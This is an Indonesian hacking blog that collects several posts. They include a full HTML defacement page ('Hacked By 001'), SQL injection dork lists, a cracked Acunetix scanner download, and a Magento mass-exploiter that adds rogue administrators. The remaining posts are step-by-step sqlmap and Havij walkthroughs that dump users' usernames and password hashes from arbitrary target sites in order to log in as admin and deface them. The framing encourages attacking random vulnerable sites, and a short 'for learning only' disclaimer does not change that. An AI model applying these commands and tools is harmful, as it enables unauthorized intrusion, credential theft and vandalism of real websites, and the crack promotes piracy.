Script Deface Keren 3

Kali ini saya akan membagikan script deface keren.
Langsung aja ya , Tampilan Scripnya seperti ini .

Script

<html><!--

--><head>

<meta http-equiv="content-type" content="text/html; charset=windows-1252">

<title>Got Hacked</title>

<link href="%5B%21%5DStrucked_files/css.css" rel="stylesheet" type="text/css">

<!-- Meta -->

<meta name="keywords" content="">

<meta name="description" content="">

<meta name="rating" content="General">

<meta name="revisit-after" content="1 days">

<meta name="classification" content="Hacked">

<meta name="robots schedule" content="auto">

<!-- End Meta -->

<style type="text/css">

#font {

font-family:narrow;

font-size:80px;

text-shadow: 8px 9px 10px #000000;

color:red;

}

#font1 {

font-family:orbitron;

font-size:50px;

text-shadow: 8px 9px 10px #000000;

color:green;

}

#font2 {

font-family:Attract more women;

font-size:22px;

text-shadow: 8px 9px 10px #000000;

color:grey;

}

</style>

<style>

html, body, a, a:hover {

                        cursor:url('http://cur.cursors-4u.net/cursors/cur-2/cur117.cur'), auto !important;

}

</style></head>

<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" bgcolor="black">

<table height="100%" width="100%">

<tbody><tr><td align="center">

<font face="brush script mt">

<div id="font">[!]HACKED[!]</div><br>

<div id="font1">Hacked By 001</div><br><br>

<div id="font2">Indonesia Cyber Army</div></font><p><font face="brush script mt">

</font>

</p><center>

<object data="%5B!%5DStrucked_files/player_mp3_mini.swf" type="application/x-shockwave-flash" height="14" width="1">

<param name="movie" value="http://flash-mp3-player.net/medias/player_mp3_mini.swf">

<param name="bgcolor" value="#000000">

<param name="flashvars" value="mp3=http://api.ning.com/files/c9o2k-qynZrIL1ejfFhvRZympB2CifaTjQRl*U-1gB0EDInvZugxLqvUMTVk065XdT7bBDTyPnnCXYZJmBNojWX57d4xHrZb/04AwakeAndAlive.mp3&amp;autoplay=1&amp;loadingcolor=000000&amp;buttoncolor=000000&amp;slidercolor=000000">

</object>

</center>

</td></tr></tbody></table></body></html>

Ganti yg warna biru dengan yg anda inginkan.

Sekian semoga bermanfaat ..

Kumpulan Dork Sql 1n7ection

Halo sobat dikesempatan kali ini saya akan share dork SQL Injection terbaru 2015 dari berbagai macam sumber di forum-forum hacking, blog hacking, dll. Dork ini berguna untuk mencari situs yang memiliki celah Sql injection, jika sudah dapat celahnya bisa kita "oprek-oprek" deh dengan salah satu metode yaitu Havij,dan Sqlmap. Langsung aja di download, kalau dishare disini pasti loading lama dan blog akan terasa berat karena terlalu banyak dorknya. Berikut bukti screenshootnya :

Download     :   dork SQL Injection - [44Kb/Link : Google Drive]

Ok sekian semoga hal yang saya bagikan ini dapat bermanfaat bagi kita semua dab Jika link download tidak berkerja, sobat bisa memberitahu saya dengan cara komentar dibawah postingan ini. Terima kasih!. 

Download Acunetix Web Vulnerability Scanner 9 Full Crack

 Acunetix web vulnerability Scanner digunakan untuk mngetahui celah suatu Website seperti SQL Injection, Cross Site Scripting, Upload files, XSS attack, dll. Dan software ini dapat menguji keamanan suatu website secara otomatis dengan mengaudit website dengan memeriksa kerentanan hacking untuk dieksploitasi. 

Screenshot

Informasi software

• Nama file : Acunetix_Web_Vulnerability_Scanner_v9.0-BlogSimple!
• Versi : 9.0
• Size : 35,5 MB
• Developer : Acunetix Ltc
• Support on : All windows family

Download

• Acunetix Web Vulnerability Scanner v9.0 
• Acunetix Web Vulnerability Scanner v9.0 [Crack]

Tutorial install

1. Setelah file didownload lalu ekstrack kedua file.
2. Jalankan Acunetix_Web_Vulnerability_Scanner_v9.0.exe
3. Next, Next, Next.
4. Jalankan Acunetix_Web_Vulnerability_Scanner_v9.0[Crack].exe
5. Klik save license
6. Selesai

Tested on Windows 7, 8, 10 work 100%

Terima kasih!, Semoga bermanfaat^^

Tutorial Magento Add Administrator Mass Exploiter V.3

Hello World; Pagi Fans, Please Say Hello Haters :*

xixixhi, kali ini gue akan Share salah satu Bug/Celah pada salah satu CMS eCommerce, yaituCMS Magento, menggunakan Teknik Add Administrator.

xixixhi, biasanya para Kardiman dan sesepuh Dispenser yang biasa maen Log $_$ , bakal suka nih ama yang berbau cms eshop komersial >.<" akwkwak

1. Download script nya disini | 

(setelah di download, simpan file dgn ekstensi .php )

penampakan tool ~

Dork:
store/index.php/checkout/cart

(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

2. Dorking di Search Engine
3. karna ini tool Mass Exploiter, silahkan kumpulkan target2 yang menggunakan CMS Magento, biar nanti si tool yang akan mengEksekusi

4. Masukan tool mass exploiter yang tadi sudah di download, taruh di folder C:/xampp/php
5. lalu masukan list target ke notepad, dan save ke folder C:/xampp/php
6. ketikan perintah:

cd C:/xampp/php
php namafiletadi.php listtarget.txt

Jika Sukses, akan terlihat seperti di SS.
Kita coba langsung ke page admin Loginnya: target.coli/admin

Login menggunakan user dan psswd yg nampak di terminal, itu sudah auto dibuat oleh tool.

Dan #~BooM

Xihihi, sekian sedikit penjelasan pada bug CMS Magento, dan cara pemakaian tools[PHP] Magento Add Administrator Mass Exploiter V.3

$_$ untuk selanjutnya silahkan kreasikan sendiri <(") $_$

Cara Menggunakan SQLMAP di Windows

Hello,.. ^_^

hanya sekedar ingin berbagi ilmu, kali ini saya mau share tentang sqli otomatis menggunakan sqlmap di windows.

sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

ok, langsung saja download dulu alat perang nya :
-python 2.7
-sqlmap

 untuk tutorialnya :
1. download kedua file di atas, instal python, extrack sqlmap nya
    (misalkan saya extrack di C:\Python27\tool\sqlmap)

2. cari website yg vuln terhadap sqli, (untuk dork bisa lihat di sini)
    ok, saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di om google
  
3. buka cmd (haruskah daku memberitahu caranya -_- ) 
    setelah itu ketik di cmd "cd [direktori sqlmap tadi yg anda extract]" lalu enter,..
    misalnya di sini direktori saya  >> C:\Python27\tool\sqlmap
    jadi seperti ini :

4. setelah itu masukan perintah :  "sqlmap.py -u https://www.target.com/index.php?id=7 --dbs" tanpa tanda petik lalu enter,..                          

         *yang berwarna biru ganti dengan url target mu
         *perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

         maka hasilnya akan seperti ini :

 jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini

 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter

kita telah mendapatkan nama databasenya yaitu :
           1.*yang saya sensor(dalam hal ini kita namakan saja db_xxx)
           2. information_schema

5. setelah itu saat nya kita bongkar isinya , tapi database yang mana ? hmm,...
    sepertinya saya tertarik dengan yang db_xxx , kenapa hayoo ?  feeling aja :p

lalu kita masukan perintah ini :

sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx --tables [enter]
* yang warna biru url target
* yang warna hijau nama database yang mau di bongkar

fungsi :
           -u = url
          -D = database
   --tables = untuk mendapatkan tables dari database

maka hasilnya seperti ini :

wuihh muncul tablenya xD

[11 tables]
+-------------------+
| areas                      |
| categories               |
| featured                  |
| fields                      |
| jobfields                 |
| member_areas        |
| member_categories |
| member_fields        |
| members                |
| projects                  |
| users                      |
+-------------------+

6. sekarang kita lihat dari tabel2 tersebut kira kira user dimna ? , mungkin di tabel user :v
    mari kita check dengan perintah:

    sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users --columns [enter]
    * yang warna merah, nama tabel yang ingin dilihat columnnya

    fungsi :
               -T = nama table
   --columns  = melihat columns di table

maka hasilnya akan seperti ini :

kita telah mendapat kan nama column dari tabel users

7. sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi dari column password dan username saja, dengan memasukan perintah :

sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users -C password,username --dump
*yang warna pink, nama column yang ingin dilihat datanya

fungsi :
          -C =  nama column
   --dump =  melihat data di column

maka hasilnya seperti ini :

dan tadaaa,... \(^_^)/

kita dapet username ama passwordnya(password masih dalam bentuk hash, untuk tipe2 hash bisa lihatdi sini)

sekarang tinggal ngecrack passwordnya terus cari admin loginnya >> tebass 3:)


saya tidak bertanggung jawab atas apa yang anda lakukan, ini hanya untuk materi pembelajaran saja

Semoga bermanfaat, terima kasih ^_^

Cara deface dengan Havij 1.17

 Deface mendeface website memang banyak caranya, tapi kali ini saya akan membahas cara mendeface dengan menggunakan havij. ok 

Alat tempur
- Havij,  jika belum punya download disini - Auto generate link disini
- Target website yang akan kita deface
untuk mencari target bisa menggunakan dork. klik disini
jika udah siap semuanya. 


1. Silahkan buka tools Havij agan, 

2. Masukkan link target ke kolom target lalu klik "Analyze"
NB : Masukkan bagian url yang berakhiran id=angka untuk di inject, bukan indexnya
Contoh : www.site.com/index.asp?id=123 seperti contoh yang ada di havijnya

3. Di bagian bawah, proses scan akan berjalan untuk mencari databasenya. Selama proses scanning, Havij akan berstatus Analyzing Target. Jika proses scan selesai, Havij akan berstatus I'm IDLE.

4. Jika Havij sudah berstatus I'm IDLE tekan tables, setelah itu klik "Get DBs"

5. Tunggu prosesnya, jika sudah silahkan anda klik "Get Tables"

6. Nah disitu nanti akan ada beberapa table, coba anda tebak ada dimana letak admin dan passwordnya, jika anda sudah merasa menemukannya anda centang lalu klik "Get Column"

7. Jika sudah nanti anda akan menemukan data yang anda cari seperti username dan password. Anda centang keduanya lalu klik "Get Data" untuk melihat username dan passwordnya

8. Selesai. Anda sudah mendapatkan username dan password target. Anda tinggal cari halaman login adminnya menggunakan fasilitas admin finder di havij tersebut. Jika password anda berupa MD5 seperti e10adc3949ba59abbe56e057f20f883e coba anda gunakan fasilitas MD5 untuk mencrack password itu.

9. Dan kini anda sudah masuk ke admin panel web target tersebut ^_^

Notes!! Tidak semua web itu vuln atau bisa di Deface, kita harus mencari target mana yang memiliki kelemahan dan vulnerability dengan menggunakan dork.

Baca juga artikel menarik lainya:

• Download Acunetix Web Vulnerability Scanner 9 Full Crack

• Kumpulan Dork Sql 1n7ection

• Script Deface Keren 2

• Script Deface Keren 3